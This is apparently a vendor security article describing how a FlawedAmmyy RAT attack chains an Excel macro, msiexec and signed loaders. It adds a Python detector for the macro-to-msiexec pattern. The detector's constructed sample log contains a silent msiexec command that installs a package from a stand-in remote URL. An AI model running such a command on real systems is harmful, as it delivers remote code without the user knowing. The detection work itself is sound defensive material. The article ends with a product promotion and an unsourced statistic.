A new set of tweets from Microsoft Security Intelligence walks through an attack that chains several built-in Windows tools to infect machines with the notorious FlawedAmmyy RAT.

Here’s how it works:

  1. The potential victim receives an email written in Korean with an Excel spreadsheet attached.
  2. When opened, the Excel file runs a macro that calls msiexec.exe.
  3. msiexec downloads a Microsoft Installer (MSI) file and installs it.
  4. The MSI file contains a digitally signed executable (so it must be safe, right?) that decrypts a second executable and loads it directly into memory.
  5. The second executable downloads another digitally signed file, wsus.exe.
  6. That file runs and loads the final payload, the FlawedAmmyy RAT, into memory.
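Steps 2 and 3 are the part of this chain a defender can see most cheaply: an Office process spawning msiexec.exe, and msiexec being handed a remote package URL with a quiet-install switch. The detection logic below is an added example written for this article; it is not Microsoft's or CyberQuay's code. It assumes a simple constructed `key=value|key=value` process-creation log format (real telemetry such as Sysmon Event ID 1 carries the same fields under similar names), and the rule for wsus.exe assumes the dropped copy runs from a user-writable directory, which the tweets do not state.

```python
"""Flag the Excel -> msiexec -> remote MSI pattern in process-creation events.

Added example: the log format and the sample events below are constructed
for illustration; the field names mirror common endpoint telemetry."""
import re
from dataclasses import dataclass

# Office applications that should rarely, if ever, spawn an installer.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
# msiexec accepts a URL as the package argument, which is how step 3 works.
REMOTE_URL = re.compile(r"https?://\S+", re.IGNORECASE)
# Quiet/no-UI switches (/q, /qn, /quiet) keep the install invisible to the user.
QUIET_SWITCH = re.compile(r"(?i)(^|\s)/q")
# Assumption (not from the article): legitimate signed binaries live under
# these roots; a wsus.exe elsewhere is worth a look.
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX style path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event: ProcessEvent) -> list:
    """Return the names of the rules this event matches (empty if none)."""
    findings = []
    parent = _basename(event.parent_image)
    child = _basename(event.image)
    cmd = event.command_line
    remote = bool(REMOTE_URL.search(cmd))

    if parent in OFFICE_PARENTS and child == "msiexec.exe":
        findings.append("office-spawned-msiexec")          # step 2
    if child == "msiexec.exe" and remote:
        findings.append("msiexec-remote-package")           # step 3
    if child == "msiexec.exe" and remote and QUIET_SWITCH.search(cmd):
        findings.append("msiexec-quiet-remote-install")     # step 3, silent
    if child == "wsus.exe" and not event.image.lower().startswith(TRUSTED_ROOTS):
        findings.append("unexpected-wsus-location")         # step 5 (assumed path rule)
    return findings


def parse_line(line: str) -> ProcessEvent:
    """Parse one constructed 'Key=Value|Key=Value' log line."""
    fields = dict(part.split("=", 1) for part in line.strip().split("|"))
    return ProcessEvent(fields["ParentImage"], fields["Image"], fields["CommandLine"])


def scan(lines):
    """Return (line_index, findings) for every line that trips at least one rule."""
    results = []
    for index, line in enumerate(lines):
        findings = classify(parse_line(line))
        if findings:
            results.append((index, findings))
    return results


# Constructed sample telemetry: one event per chain step of interest plus benign noise.
SAMPLE_LOG = [
    r"ParentImage=C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
    r"|Image=C:\Windows\System32\msiexec.exe"
    r"|CommandLine=msiexec.exe /i http://example.invalid/pkg.msi /q",
    r'ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\msiexec.exe'
    r'|CommandLine=msiexec.exe /i "C:\Users\alice\Downloads\app.msi"',
    r"ParentImage=C:\Windows\System32\services.exe|Image=C:\Windows\System32\svchost.exe"
    r"|CommandLine=svchost.exe -k netsvcs",
    r"ParentImage=C:\Users\alice\AppData\Local\Temp\loader.exe"
    r"|Image=C:\Users\alice\AppData\Local\Temp\wsus.exe|CommandLine=wsus.exe",
]

if __name__ == "__main__":
    for index, findings in scan(SAMPLE_LOG):
        print(f"line {index}: {', '.join(findings)}")
```

The first sample line trips all three msiexec rules at once, which is the signal worth alerting on; a user double-clicking a downloaded MSI from Explorer (second line) matches none of them, so the rules separate the Office-macro chain from ordinary installs without needing to know anything about the signed payloads that follow.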

Like 90% of successful malware attacks, this one starts with a socially engineered phishing email: the user opens it and then downloads the attachment.

All of this can be avoided with a CDR tool, such as CyberQuay’s next-gen CDR solution, that scans and disarms the harmful content in the attached Excel file.